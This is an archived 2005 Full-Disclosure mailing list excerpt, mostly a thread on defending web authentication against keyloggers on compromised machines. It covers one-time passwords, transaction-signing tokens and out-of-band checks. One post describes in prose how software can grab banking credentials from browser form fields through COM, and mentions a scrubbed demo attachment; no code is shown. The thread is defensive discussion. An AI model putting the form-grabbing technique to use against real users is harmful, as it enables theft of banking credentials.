18:03:53 2005 From: rodrigob at suespammers.org (Rodrigo Barbosa) Date: Fri, 2 Dec 2005 16:03:53 -0200 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <1133544916.49544.32.camel@localhost> References: <228735040512011518o7b5fa823h77c5c14135927a9f@mail.gmail.com> <1133544916.49544.32.camel@localhost> Message-ID: <20051202180353.GI9695@suespammers.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, Dec 02, 2005 at 11:35:16AM -0600, Frank Knobbe wrote: > At the end of the day, one-time-passwords for login *and* transactions > are probably the only real solution to prevent replay and mitm attacks > (the latter using OTP hashed transactions). Actually, there is always the possibility of out-of-band authentication. Here is a scenary I've encountered before: 1) You get to the login screen 2) The login screen will give you a code 3) You get the phone, dial a number, and enter the code provided, along with some other information 4) The system authenticates you out of band 5) You simply click "continue" on the login screen There are other possible scenaries, of course, but this is just one I've seen once. []s - -- Rodrigo Barbosa "Quid quid Latine dictum sit, altum viditur" "Be excellent to each other ..." - Bill & Ted (Wyld Stallyns) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFDkIyJpdyWzQ5b5ckRAh9lAJsF6pCRCYI1E0U5cxF/BHeV+Kou4ACgt6jd JfyyCsb8IkYYOrFMX2PVw/o= =RgHh -----END PGP SIGNATURE----- From michael.holstein at csuohio.edu Fri Dec 2 18:14:00 2005 From: michael.holstein at csuohio.edu (Michael Holstein) Date: Fri, 02 Dec 2005 13:14:00 -0500 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <20051202180113.99CC9ABB@lists.grok.org.uk> References: <20051202180113.99CC9ABB@lists.grok.org.uk> Message-ID: <43908EE8.7000604@csuohio.edu> > Average time taken by a user for entering Bank PINs using onscreen keyboards > is 1 - 1.5 mins. > Size of AVI file generated for 1 - 1.5 min of recording > 1 MB > Assuming 10 such recording per day, size > 10 mb Why bother with that? .. just grab one screenshot per mouseclick. From BlueBoar at thievco.com Fri Dec 2 18:48:06 2005 From: BlueBoar at thievco.com (Blue Boar) Date: Fri, 02 Dec 2005 10:48:06 -0800 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <1133544916.49544.32.camel@localhost> References: <228735040512011518o7b5fa823h77c5c14135927a9f@mail.gmail.com> <1133544916.49544.32.camel@localhost> Message-ID: <439096E6.3010509@thievco.com> Frank Knobbe wrote: You can make the authentication step as secure as you like (and granted, that's what the thread is about, and what the OTP asked for) but don't forget that the 0wner of your machine still has the option to take over your transaction(s) post-authentication. BB From jan at boyakasha.dk Fri Dec 2 18:51:03 2005 From: jan at boyakasha.dk (Jan Nielsen) Date: Fri, 2 Dec 2005 19:51:03 +0100 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <1133457890.12950.80.camel@localhost> Message-ID: <003f01c5f771$6824e260$c864a8c0@dopehead> That question opens up a whole lotta other questions, really depends on what you hope to achieve by doing authentication via a compromised system. In my book you should instead try to detect a compromised system and deny them access if they are indeed compromised, that would be in the end-users best interest I think (and of course report your findings to the users mailbox or something, don't tell the hacker that you detected his keylogger :-) Keyloggers come in quite a few different shapes and sizes, and just detecting the most common ones is not really that future-proof, tomorrow someone will develop another way of hooking into the keyboard buffer, or some other way you never thought of yourself. However the most common ones today would be the ones hooking into the windows api (not that hard to detect) and the screen capture ones I think (a bit more difficult) But that really raises the question : is keylogging really the only thing constituting a compromised system ? Answer : NO, many other types of software could make your system compromised, so what you need to think about is : what do I want to protect/enforce/check : - The endusers login information, so as it can't be stolen or re-used ? - The integrity of the transactions, has someone changed the info on its way from the input into the application to the website ? - The identity of the person behind the keyboard, is the user who you think he is ? That might help you in deciding what stuff you need to develop/implement. Hope this helps a bit :-) Jan -----Original Message----- From: boyakash at cp.goodydomains.com [mailto:boyakash at cp.goodydomains.com] On Behalf Of Shannon Johnston Sent: 1. december 2005 18:25 To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] Most common keystroke loggers? Hi All, I'm looking for input on what you all believe the most common keystroke loggers are. I've been challenged to write an authentication method (for a web site) that can be secure while using a compromised system. Thanks, Shannon _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From frank at knobbe.us Fri Dec 2 18:53:22 2005 From: frank at knobbe.us (Frank Knobbe) Date: Fri, 02 Dec 2005 12:53:22 -0600 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <439096E6.3010509@thievco.com> References: <228735040512011518o7b5fa823h77c5c14135927a9f@mail.gmail.com> <1133544916.49544.32.camel@localhost> <439096E6.3010509@thievco.com> Message-ID: <1133549602.49544.70.camel@localhost> On Fri, 2005-12-02 at 10:48 -0800, Blue Boar wrote: > You can make the authentication step as secure as you like (and granted, > that's what the thread is about, and what the OTP asked for) but don't > forget that the 0wner of your machine still has the option to take over > your transaction(s) post-authentication. That's why I emphasized that the use of tokens should not only be made for initial authentication, but also for *each transaction*. Any transaction can be hashed with a one-time code generated by a token and sent as a control with the transaction parameters. Any MITM interception and modification will invalidate that hash thus voiding the transaction. These things have been available since the mid-nineties, but are either still not applied, or improperly applied. There are a lot of cases where tokens are used for authentication, but only there, not preventing MITM attacks. (why should they, it's protected with SSL, right ;) So, yeah, we need to stress the fact that transactions need to be secured, not just initial auth. Cheers! Frank -- It is said that the Internet is a public utility. As such, it is best compared to a sewer. A big, fat pipe with a bunch of crap sloshing against your ports. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 187 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051202/86f1b06b/attachment.bin From BlueBoar at thievco.com Fri Dec 2 19:12:56 2005 From: BlueBoar at thievco.com (Blue Boar) Date: Fri, 02 Dec 2005 11:12:56 -0800 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <1133549602.49544.70.camel@localhost> References: <228735040512011518o7b5fa823h77c5c14135927a9f@mail.gmail.com> <1133544916.49544.32.camel@localhost> <439096E6.3010509@thievco.com> <1133549602.49544.70.camel@localhost> Message-ID: <43909CB8.3090603@thievco.com> Frank Knobbe wrote: > That's why I emphasized that the use of tokens should not only be made > for initial authentication, but also for *each transaction*. Any > transaction can be hashed with a one-time code generated by a token and > sent as a control with the transaction parameters. Any MITM interception > and modification will invalidate that hash thus voiding the transaction. I agree. I'd also like to point out that the "token" has to actually do the transaction processing for it to still be secure. The PC at that point is more-or-less just another untrusted pipe. The banking industry probably should be looking into making $40 USB co-computers with a 2-line LCD display and accept/decline buttons. Reason being that the user still needs to use the compromised computer to type in what the transaction is, and for how much. The token needs to display the size and type of the transaction for approval. I.e. if Grandma says to transfer $50 to PG&E, she needs to see that the token doesn't say transfer $1000 to Nigeria. And I'd STILL not be happy with how easy it would be for clueless users to authorize such a transaction. But I don't know how to fix that. BB From frank at knobbe.us Fri Dec 2 19:22:04 2005 From: frank at knobbe.us (Frank Knobbe) Date: Fri, 02 Dec 2005 13:22:04 -0600 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <43909CB8.3090603@thievco.com> References: <228735040512011518o7b5fa823h77c5c14135927a9f@mail.gmail.com> <1133544916.49544.32.camel@localhost> <439096E6.3010509@thievco.com> <1133549602.49544.70.camel@localhost> <43909CB8.3090603@thievco.com> Message-ID: <1133551324.49544.80.camel@localhost> On Fri, 2005-12-02 at 11:12 -0800, Blue Boar wrote: > I agree. I'd also like to point out that the "token" has to actually do > the transaction processing for it to still be secure. The PC at that > point is more-or-less just another untrusted pipe. The banking industry > probably should be looking into making $40 USB co-computers with a > 2-line LCD display and accept/decline buttons. Yup. These token have been around since the mid-nineties. My favorite vendor in that respect is Vasco Data Security. I'm not up-to-date with their current product lines, but back then they had a little device that looked like a small calculator (it could actually be used as such too). The user enters the transaction data, say account number -- enter -- destination number -- enter -- amount -- enter, and the token would then display a code which is basically a hash of the values and a unique but changing value to that token (like the value on an RSA SecureID card). The user then enters that hash value into the transaction form and submits it. It was secure (you need the device to calculate the correct hash, and changing any value during transmission voided the hash and thus transaction). But more importantly, it was very easy to use. Any grandmother that can use a calculator to add numbers can use this puppy to conduct secure transactions online. And it was pretty affordable, with unlimited lifespan (no SecureID-rebuy-in-2-years nonsense). Maybe they were ahead of their time back then, or perhaps no one foresaw the need for it. These days, everyone should be familiar with the terms "identify theft" and "bankruptcy", so perhaps these devices will -- a decade later -- come into fashion once again. Cheers, Frank PS: I still have one of those calculator tokens (demo model) and it still runs! :) -- It is said that the Internet is a public utility. As such, it is best compared to a sewer. A big, fat pipe with a bunch of crap sloshing against your ports. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 187 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051202/f63e6a3e/attachment.bin From info at inet-sec.net Fri Dec 2 14:58:41 2005 From: info at inet-sec.net (inet-sec) Date: Fri, 2 Dec 2005 15:58:41 +0100 Subject: [Full-disclosure] Software Firewalls for Windows References: Message-ID: <003701c5f750$e4b775c0$0100a8c0@nuclearwinter> Http://www.xray-ids.com is also a nice application. its not a firewall but a software based intrusion detection system for windows. just thought you might be interested. ----- Original Message ----- From: "Aditya Deshmukh" To: "'Paul Stephens'" ; Sent: Friday, December 02, 2005 5:52 AM Subject: RE: [Full-disclosure] Software Firewalls for Windows > > > Hi list, I've been a firm advocate of Sygate Pro for some > > time but as Symantec > > has bought and canned it I'm wondering what you guys would > > recommend as a > > replacement. > > Tiny Firewall 2005 works for both 64 and 32 bit machines > And is good - I have been using in since version 2.1.5 > And now its 6.5.xx > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From mail at hackingspirits.com Fri Dec 2 19:53:22 2005 From: mail at hackingspirits.com (Debasis Mohanty) Date: Sat, 3 Dec 2005 01:23:22 +0530 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <1133543428.12950.108.camel@localhost> Message-ID: <20051202195507.02999A57@lists.grok.org.uk> The point that everyone seems to have out here is, all these User IDs / PINs etc are all stored in clear text in the web 'form fields'. These days attacks are much more sophisticated and stealth. The idea of X-x-X screen capture is bit outdated and can easily be fooled. Ex: If an user has to type a PIN as 2031156, then just to fool those screen capture progms; the user can first . Although, the screen capture program will capture each one of those mouse clicks but will miss those keystrokes and the sequence might get disturbed. It will be a pain in the ass for attacker to analyse the scrambled logs and get the correct PIN. As all those user credentials are stored in clear text in the web forms, a program can use COM (in case of IE) to retrieve those data directly from the form elements. Here the user can't so easily fool the program by using the above technique as the data will be directly captured for the web form elements once the user try to submit the form. I have attached a screenshot of a demo program which uses this technique. - D -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Shannon Johnston Sent: Friday, December 02, 2005 10:40 PM To: Full-Disclosure Subject: Re: [Full-disclosure] Most common keystroke loggers? This is fantastic! I like all the feed back that has been coming through. I think that it would be helpful to explain a bit more. The original question about keystroke loggers was an effort to find some loggers that were in use (with screen capture capability) so they could be used in our testing. The actual problem stems from our efforts of trying to secure an application keeping in mind that a user's system may be compromised, and/or the user has been socially engineered into giving out important credential information. We've been playing with 2-factor authentication, randomized graphical "keyboards", S/Key, one time passwords (sent via email/SMS), even getting to the point where the system will call a user on the phone and ask for a verification word when authentication is attempted. I know that education of the end user is the best defense, but there will always be people who just don't get it. With that logic I almost have to consider the user an untrusted source. The goal of the project is to see if we can design a system that prevents an uneducated user from shooting themselves in the in the foot. Shannon On Fri, 2005-12-02 at 12:01 +1300, Nick FitzGerald wrote: > deepquest wrote: > > > To me the only thing that can defeat keystroke is what a software or > > trojan can not do: See (OCR is just a partial application of guess > > but not applicable in that case) > > Then you are so far inside the box you cannot see the walls... > > The OP said "keystroke logger" BUT he also said "compromised". If the > machine is compromised you cannot limit yourself to "keylogging" as a > compromised machine may be running _anything_ (including something not > yet written, as we are talking about a hypothetical future situation, > so the OP limiting the original question to "the most common keylogger" > is further evidence that the OP does not understand the actual problem > set he has been posed). > > > Imagine a web page with a virtual keyboard page (clickable). In order > > to prevent the localisation on the keys mapping based on position of > > the mouse, display the keyboard on random location of the screen. ... > > Trivially, and already long ago, overcome by screen-shot keyloggers. > > > ... Add > > a random password and challenge authentication process. > > Why? > > This adds nothing but annoyance to the user, thus reducing usability. > If you're going to move to OTP, why _also_ move to an onscreen > keyboard? It's almost like you believe that taking two unrelated > approaches that indivdually make no improvement whatsoever will > suddenly make some real improvement when combined. A hint -- zero plus > zero equals ?????? > > As already explained ad nauseum to the other na?ve "use OTP", if you do > not do something "out of band" _relative to any and all possible "bad > code" that could be running on a compromised machine_, you have lost. > To achieve that requires a second, "secure" piece of _hardware_ that > simply uses the network connection through the compromised machine to > communicate in a crptographically secure way with the server. The OP > made no mention of designing hardware > > > my 2 cents, > > If that's really what the above "advice" is worth, inflation must be > _really bad_ where you are! > > > Regards, > > Nick FitzGerald > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From mail at hackingspirits.com Fri Dec 2 19:56:54 2005 From: mail at hackingspirits.com (Debasis Mohanty) Date: Sat, 3 Dec 2005 01:26:54 +0530 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <20051202195507.02999A57@lists.grok.org.uk> Message-ID: <20051202195835.AB94EBED@lists.grok.org.uk> Typo -> -D -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Debasis Mohanty Sent: Saturday, December 03, 2005 1:23 AM To: sjohnston at cavionplus.com; 'Full-Disclosure' Subject: RE: [Full-disclosure] Most common keystroke loggers? The point that everyone seems to have out here is, all these User IDs / PINs etc are all stored in clear text in the web 'form fields'. These days attacks are much more sophisticated and stealth. The idea of X-x-X screen capture is bit outdated and can easily be fooled. Ex: If an user has to type a PIN as 2031156, then just to fool those screen capture progms; the user can first . Although, the screen capture program will capture each one of those mouse clicks but will miss those keystrokes and the sequence might get disturbed. It will be a pain in the ass for attacker to analyse the scrambled logs and get the correct PIN. As all those user credentials are stored in clear text in the web forms, a program can use COM (in case of IE) to retrieve those data directly from the form elements. Here the user can't so easily fool the program by using the above technique as the data will be directly captured for the web form elements once the user try to submit the form. I have attached a screenshot of a demo program which uses this technique. - D -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Shannon Johnston Sent: Friday, December 02, 2005 10:40 PM To: Full-Disclosure Subject: Re: [Full-disclosure] Most common keystroke loggers? This is fantastic! I like all the feed back that has been coming through. I think that it would be helpful to explain a bit more. The original question about keystroke loggers was an effort to find some loggers that were in use (with screen capture capability) so they could be used in our testing. The actual problem stems from our efforts of trying to secure an application keeping in mind that a user's system may be compromised, and/or the user has been socially engineered into giving out important credential information. We've been playing with 2-factor authentication, randomized graphical "keyboards", S/Key, one time passwords (sent via email/SMS), even getting to the point where the system will call a user on the phone and ask for a verification word when authentication is attempted. I know that education of the end user is the best defense, but there will always be people who just don't get it. With that logic I almost have to consider the user an untrusted source. The goal of the project is to see if we can design a system that prevents an uneducated user from shooting themselves in the in the foot. Shannon On Fri, 2005-12-02 at 12:01 +1300, Nick FitzGerald wrote: > deepquest wrote: > > > To me the only thing that can defeat keystroke is what a software or > > trojan can not do: See (OCR is just a partial application of guess > > but not applicable in that case) > > Then you are so far inside the box you cannot see the walls... > > The OP said "keystroke logger" BUT he also said "compromised". If the > machine is compromised you cannot limit yourself to "keylogging" as a > compromised machine may be running _anything_ (including something not > yet written, as we are talking about a hypothetical future situation, > so the OP limiting the original question to "the most common keylogger" > is further evidence that the OP does not understand the actual problem > set he has been posed). > > > Imagine a web page with a virtual keyboard page (clickable). In order > > to prevent the localisation on the keys mapping based on position of > > the mouse, display the keyboard on random location of the screen. ... > > Trivially, and already long ago, overcome by screen-shot keyloggers. > > > ... Add > > a random password and challenge authentication process. > > Why? > > This adds nothing but annoyance to the user, thus reducing usability. > If you're going to move to OTP, why _also_ move to an onscreen > keyboard? It's almost like you believe that taking two unrelated > approaches that indivdually make no improvement whatsoever will > suddenly make some real improvement when combined. A hint -- zero plus > zero equals ?????? > > As already explained ad nauseum to the other na?ve "use OTP", if you do > not do something "out of band" _relative to any and all possible "bad > code" that could be running on a compromised machine_, you have lost. > To achieve that requires a second, "secure" piece of _hardware_ that > simply uses the network connection through the compromised machine to > communicate in a crptographically secure way with the server. The OP > made no mention of designing hardware > > > my 2 cents, > > If that's really what the above "advice" is worth, inflation must be > _really bad_ where you are! > > > Regards, > > Nick FitzGerald > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From mail at hackingspirits.com Fri Dec 2 20:08:49 2005 From: mail at hackingspirits.com (Debasis Mohanty) Date: Sat, 3 Dec 2005 01:38:49 +0530 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <20051202195507.02999A57@lists.grok.org.uk> Message-ID: <20051202201041.54ABFB13@lists.grok.org.uk> The screenshot didn't get thru the first time. Hope it get thru this time !! - D -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Debasis Mohanty Sent: Saturday, December 03, 2005 1:23 AM To: sjohnston at cavionplus.com; 'Full-Disclosure' Subject: RE: [Full-disclosure] Most common keystroke loggers? The point that everyone seems to have out here is, all these User IDs / PINs etc are all stored in clear text in the web 'form fields'. These days attacks are much more sophisticated and stealth. The idea of X-x-X screen capture is bit outdated and can easily be fooled. Ex: If an user has to type a PIN as 2031156, then just to fool those screen capture progms; the user can first . Although, the screen capture program will capture each one of those mouse clicks but will miss those keystrokes and the sequence might get disturbed. It will be a pain in the ass for attacker to analyse the scrambled logs and get the correct PIN. As all those user credentials are stored in clear text in the web forms, a program can use COM (in case of IE) to retrieve those data directly from the form elements. Here the user can't so easily fool the program by using the above technique as the data will be directly captured for the web form elements once the user try to submit the form. I have attached a screenshot of a demo program which uses this technique. - D -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Shannon Johnston Sent: Friday, December 02, 2005 10:40 PM To: Full-Disclosure Subject: Re: [Full-disclosure] Most common keystroke loggers? This is fantastic! I like all the feed back that has been coming through. I think that it would be helpful to explain a bit more. The original question about keystroke loggers was an effort to find some loggers that were in use (with screen capture capability) so they could be used in our testing. The actual problem stems from our efforts of trying to secure an application keeping in mind that a user's system may be compromised, and/or the user has been socially engineered into giving out important credential information. We've been playing with 2-factor authentication, randomized graphical "keyboards", S/Key, one time passwords (sent via email/SMS), even getting to the point where the system will call a user on the phone and ask for a verification word when authentication is attempted. I know that education of the end user is the best defense, but there will always be people who just don't get it. With that logic I almost have to consider the user an untrusted source. The goal of the project is to see if we can design a system that prevents an uneducated user from shooting themselves in the in the foot. Shannon On Fri, 2005-12-02 at 12:01 +1300, Nick FitzGerald wrote: > deepquest wrote: > > > To me the only thing that can defeat keystroke is what a software or > > trojan can not do: See (OCR is just a partial application of guess > > but not applicable in that case) > > Then you are so far inside the box you cannot see the walls... > > The OP said "keystroke logger" BUT he also said "compromised". If the > machine is compromised you cannot limit yourself to "keylogging" as a > compromised machine may be running _anything_ (including something not > yet written, as we are talking about a hypothetical future situation, > so the OP limiting the original question to "the most common keylogger" > is further evidence that the OP does not understand the actual problem > set he has been posed). > > > Imagine a web page with a virtual keyboard page (clickable). In order > > to prevent the localisation on the keys mapping based on position of > > the mouse, display the keyboard on random location of the screen. ... > > Trivially, and already long ago, overcome by screen-shot keyloggers. > > > ... Add > > a random password and challenge authentication process. > > Why? > > This adds nothing but annoyance to the user, thus reducing usability. > If you're going to move to OTP, why _also_ move to an onscreen > keyboard? It's almost like you believe that taking two unrelated > approaches that indivdually make no improvement whatsoever will > suddenly make some real improvement when combined. A hint -- zero plus > zero equals ?????? > > As already explained ad nauseum to the other na?ve "use OTP", if you do > not do something "out of band" _relative to any and all possible "bad > code" that could be running on a compromised machine_, you have lost. > To achieve that requires a second, "secure" piece of _hardware_ that > simply uses the network connection through the compromised machine to > communicate in a crptographically secure way with the server. The OP > made no mention of designing hardware > > > my 2 cents, > > If that's really what the above "advice" is worth, inflation must be > _really bad_ where you are! > > > Regards, > > Nick FitzGerald > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- A non-text attachment was scrubbed... Name: citibank-vkl.zip Type: application/x-zip-compressed Size: 33418 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051203/84dd2ca7/attachment.bin From mail at hackingspirits.com Fri Dec 2 20:17:10 2005 From: mail at hackingspirits.com (Debasis Mohanty) Date: Sat, 3 Dec 2005 01:47:10 +0530 Subject: [Full-disclosure] FW: [MailServer Notification] Your .zip file has been blocked from entering the ScanSoft email environment. Message-ID: <20051202201848.2FD46231@lists.grok.org.uk> Lol !! Never seen such settings in the content filters where the notification reveals any such file paths. Another funny statement is -> "Please rename your file to filename.zzp and resend to ensure delivery." - D -----Original Message----- From: System Attendant [mailto:PB-EXCHCON-SA at scansoft.com] Sent: Saturday, December 03, 2005 1:42 AM To: 'mail at hackingspirits.com' Subject: [MailServer Notification] Your .zip file has been blocked from entering the ScanSoft email environment. ScanMail for Microsoft Exchange took action on the message. The message details were: Sender = mail at hackingspirits.com Recipient(s) = sjohnston at cavionplus.com;full-disclosure at lists.grok.org.uk; Subject = RE: [Full-disclosure] Most common keystroke loggers? Scanning time = 12/02/2005 15:11:52 Engine/Pattern = 7.510-1002/2.981.00 Action taken on message: The attachment citibank-vkl.zip matched file blocking settings. ScanMail took the action: Quarantined. The attachment was quarantined to C:\Program Files\Trend\Smex\Alert\citibank-vkl4390aa8826.zip_. The Nuance email system prohibits the transmission of file attachments with .zip extensions. Please rename your file to filename.zzp and resend to ensure delivery. Thank you for your cooperation. From illuminatus.master at gmail.com Fri Dec 2 21:17:23 2005 From: illuminatus.master at gmail.com (bf) Date: Fri, 2 Dec 2005 21:17:23 +0000 Subject: [Full-disclosure] Hacking hoax... In-Reply-To: <43905172.2030105@valhallalegends.com> References: <43905172.2030105@valhallalegends.com> Message-ID: go browse around honeynet.org, plenty of real log files to look at there. On 12/2/05, Ron wrote: > I'm hosting a bit of a hoax this week (to celebrate December Fool's Day, > not to be confused with April Fool's Day, which is real). > > What I need is some log files that seem to indicate an attack. I > already posted some FTP brute-force-looking stuff, but it was pretty weak. > > Anybody got some cool looking log files I can borrow? > > Thanks! > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From gboyce at badbelly.com Fri Dec 2 21:23:52 2005 From: gboyce at badbelly.com (gboyce) Date: Fri, 2 Dec 2005 16:23:52 -0500 (EST) Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <1133543428.12950.108.camel@localhost> References: <1133543428.12950.108.camel@localhost> Message-ID: Shannon, A compromised system and a social engineering attack to get important credential information are two very distinct problems, and will be solved in very different ways. For the social engineering attack, some of the methods I've seen so far in this thread (One Time Pads, two factor auth, etc) can be very useful. I'm sure they all have their limitations, but I'm hardly an expert, so I'll let the experts hash this one out. With the compromised system on the other hand, its pretty much game over. No matter what method you try to use to obscure the data, the person who compromised the system can get at it. The only way you're even remotely safe is if you use a completely obscure system, and you're a small enough target that no one puts the effort into working around your "security". Hardly something you can count on though. Perhaps it would be a better method to try to instead verify if a system has been compromised, and disallow the system to use your application if the system is known to be compromised. I'm not sure if anyone has spent any time researching the feasibility of third party verification of client systems. Some form of required virus/spyware scanning before allowing a client to use a service. Of course, this may severely limit what operating systems are able to connect to the service. On Fri, 2 Dec 2005, Shannon Johnston wrote: > This is fantastic! I like all the feed back that has been coming > through. I think that it would be helpful to explain a bit more. > > The original question about keystroke loggers was an effort to find some > loggers that were in use (with screen capture capability) so they could > be used in our testing. > > The actual problem stems from our efforts of trying to secure an > application keeping in mind that a user's system may be compromised, > and/or the user has been socially engineered into giving out important > credential information. > > We've been playing with 2-factor authentication, randomized graphical > "keyboards", S/Key, one time passwords (sent via email/SMS), even > getting to the point where the system will call a user on the phone and > ask for a verification word when authentication is attempted. > I know that education of the end user is the best defense, but there > will always be people who just don't get it. With that logic I almost > have to consider the user an untrusted source. > > The goal of the project is to see if we can design a system that > prevents an uneducated user from shooting themselves in the in the foot. > > Shannon > > > > On Fri, 2005-12-02 at 12:01 +1300, Nick FitzGerald wrote: >> deepquest wrote: >> >>> To me the only thing that can defeat keystroke is what a software > or >>> trojan can not do: See (OCR is just a partial application of guess >>> but not applicable in that case) >> >> Then you are so far inside the box you cannot see the walls... >> >> The OP said "keystroke logger" BUT he also said "compromised". If > the >> machine is compromised you cannot limit yourself to "keylogging" as a >> compromised machine may be running _anything_ (including something > not >> yet written, as we are talking about a hypothetical future situation, >> so the OP limiting the original question to "the most common > keylogger" >> is further evidence that the OP does not understand the actual > problem >> set he has been posed). >> >>> Imagine a web page with a virtual keyboard page (clickable). In > order >>> to prevent the localisation on the keys mapping based on position > of >>> the mouse, display the keyboard on random location of the > screen. ... >> >> Trivially, and already long ago, overcome by screen-shot keyloggers. >> >>> ... Add >>> a random password and challenge authentication process. >> >> Why? >> >> This adds nothing but annoyance to the user, thus reducing > usability. >> If you're going to move to OTP, why _also_ move to an onscreen >> keyboard? It's almost like you believe that taking two unrelated >> approaches that indivdually make no improvement whatsoever will >> suddenly make some real improvement when combined. A hint -- zero > plus >> zero equals ?????? >> >> As already explained ad nauseum to the other na?ve "use OTP", if you > do >> not do something "out of band" _relative to any and all possible "bad >> code" that could be running on a compromised machine_, you have > lost. >> To achieve that requires a second, "secure" piece of _hardware_ that >> simply uses the network connection through the compromised machine to >> communicate in a crptographically secure way with the server. The OP >> made no mention of designing hardware >> >>> my 2 cents, >> >> If that's really what the above "advice" is worth, inflation must be >> _really bad_ where you are! >> >> >> Regards, >> >> Nick FitzGerald >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From nick at virus-l.demon.co.uk Fri Dec 2 21:45:02 2005 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Sat, 03 Dec 2005 10:45:02 +1300 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <003f01c5f771$6824e260$c864a8c0@dopehead> References: <1133457890.12950.80.camel@localhost> Message-ID: <4391772D.19582.3154FA99@gmail.com> Jan Nielsen wrote: > That question opens up a whole lotta other questions, really depends on > what you hope to achieve by doing authentication via a compromised system. > In my book you should instead try to detect a compromised system and deny > them access if they are indeed compromised, ... Obviously, then, your book does not include the phrase "Halting Problem"... > ... that would be in the end-users > best interest I think (and of course report your findings to the users > mailbox or something, don't tell the hacker that you detected his > keylogger :-) And what machines do you think users are most likely to check their mail from? And, of course, your suggestion raises a primacy issue -- if you actually did detect the user's machine was compromised before they logged in and thus prevented allowing the login by not allowing the login dialog to be displayed or somesuch (thereby saving the user compromising yet more of their data), how in the heck do you know where to send the warning mail? Hmmmmm... Methinks you should think more before responding. Regards, Nick FitzGerald From nick at virus-l.demon.co.uk Fri Dec 2 22:02:40 2005 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Sat, 03 Dec 2005 11:02:40 +1300 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: References: <1133543428.12950.108.camel@localhost> Message-ID: <43917B50.8687.316521B9@gmail.com> gboyce wrote: <> > Perhaps it would be a better method to try to instead verify if a system > has been compromised, and disallow the system to use your application if > the system is known to be compromised. See my very recent response to exactly the same misguided suggestion from Jan Nielsen. A rather clever chap called Turing had something to say about the impossibility of this (at least, for the types of computers we are talking about). > I'm not sure if anyone has spent any time researching the feasibility of > third party verification of client systems. ... Like the Trusted Computing Initiave (or whatever they call themselves these days)??? > ... Some form of required > virus/spyware scanning before allowing a client to use a service. ... That is _far_ from inadequate for this purpose -- see Turing... > ... Of > course, this may severely limit what operating systems are able to connect > to the service. Not necessarily. Well, the AV check suggestion might, but a properly designed and implemented "trusted computing base" style system could be CPU and OS agnostic (at least, if we can all agree up front on who we are all going to trust forever to be the gatekeepers of the TCB!). Regards, Nick FitzGerald From security at mandriva.com Fri Dec 2 22:26:01 2005 From: security at mandriva.com (Mandriva Security Team) Date: Fri, 02 Dec 2005 15:26:01 -0700 Subject: [Full-disclosure] MDKSA-2005:221 